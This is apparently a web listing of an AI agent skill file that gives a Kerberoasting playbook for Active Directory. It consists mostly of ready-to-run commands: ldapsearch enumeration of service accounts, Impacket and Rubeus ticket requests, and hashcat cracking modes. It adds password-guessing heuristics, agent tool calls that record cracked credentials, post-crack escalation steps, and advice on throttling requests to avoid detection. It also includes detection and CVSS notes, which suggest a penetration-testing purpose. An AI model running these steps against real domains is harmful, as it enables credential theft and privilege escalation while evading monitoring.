kerberoasting

star 4.4k

Request Kerberos TGS tickets for SPN-bound service accounts and crack offline with hashcat — classic AD priv-esc primitive.

PurpleAILAB By PurpleAILAB schedule Updated 6/2/2026

name: kerberoasting description: Request Kerberos TGS tickets for SPN-bound service accounts and crack offline with hashcat — classic AD priv-esc primitive. metadata: subdomain: active-directory when_to_use: "kerberoasting spn service ticket hashcat" mitre_attack: - T1558.003


Kerberoasting Playbook

Prerequisite

Any valid domain user. No special privileges required.

1. Identify roastable accounts

From BloodHound ingest:

kg_query(kind="user", filter="hasspn=true and enabled=true")

Or LDAP-direct:

ldapsearch -x -H ldap://DC_IP -D 'USER@DOM' -w 'PASS' \
  -b 'DC=corp,DC=local' \
  '(&(samAccountType=805306368)(servicePrincipalName=*)(!(userAccountControl:1.2.840.113556.1.4.803:=2)))' \
  sAMAccountName servicePrincipalName > /tmp/spns.txt

2. Request TGS tickets

Impacket (most reliable):

GetUserSPNs.py DOM/USER:'PASS' -dc-ip DC_IP -request \
  -outputfile /tmp/kerb.hashes

Rubeus (from Windows beachhead):

Rubeus.exe kerberoast /outfile:C:\Windows\Temp\k.txt /nowrap

Modern hashes are $krb5tgs$23$*user$DOM$spn*$<ciphertext> (RC4). If forest is Win2012+, AES tickets may come back as $krb5tgs$18$*….

3. Crack offline

# RC4 (mode 13100)
hashcat -m 13100 -a 0 /tmp/kerb.hashes /usr/share/wordlists/rockyou.txt \
        --rules-file /usr/share/hashcat/rules/best64.rule

# AES256 (mode 19700)
hashcat -m 19700 -a 0 /tmp/kerb.hashes wordlist.txt

# Targeted rules for service-account passwords (often pattern-based)
hashcat -m 13100 -a 6 /tmp/kerb.hashes wordlist.txt '?d?d?d?d' \
        --rules-file /usr/share/hashcat/rules/d3ad0ne.rule

Service-account heuristics: 60-70% of kerberoasted accounts use:

  • ServiceName + season + year (e.g. SQLSvc2024!, IISWinter25)
  • App name + 4-digit numbers
  • Default install passwords (Veeam, SCCM, Splunk admins)
  • Custom dict from OSINT (company name, products, projects)

4. Promote cracked credential

kg_add_node(kind="credential", label="USER:CRACKED_PASSWORD",
            props={"source":"kerberoast","crack_time":"<n>m","mode":"hashcat-m13100"})
kg_add_edge(src=<cred>, dst=<user>, kind="authenticates")

5. Post-crack actions

Whatever the service account can reach is now yours:

  • Run BloodHound as the new cred → re-ingest
  • Often these accounts have AdminTo on the box hosting the service
  • Sometimes they're members of Tier-0 groups (yes, really)

OPSEC notes

  • Requesting TGS tickets is logged to 4769 events on the DC
  • Detection: 4769 with Ticket Encryption Type=0x17 (RC4) when the service supports AES is anomalous
  • Rate limiting: don't request all SPNs at once on a monitored network; Impacket has no built-in throttle, write a wrapper
  • Use -no-preauth to avoid lockout if doing manual TGS via kinit

CVSS

  • Roastable + crackable in scope timeframe: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H = 9.0
  • Roastable but uncrackable (long random pw): Informational
  • AES-only + no offline crack feasible: Low

Common services found

SPN prefix Likely account Typical impact
MSSQLSvc/ SQL service account Often local admin on DB host
HTTP/sccm* SCCM service Often Domain Admin (misconfig)
MSOLAPSvc.3/ SSAS Local admin on analysis server
kadmin/changepw KDC account RARE — high value if hit
exchangeMDB/ Exchange recovery Sometimes priv group
Install via CLI
npx skills add https://github.com/PurpleAILAB/Decepticon --skill kerberoasting
Repository Details
star Stars 4,393
call_split Forks 875
navigation Branch main
article Path SKILL.md
More from Creator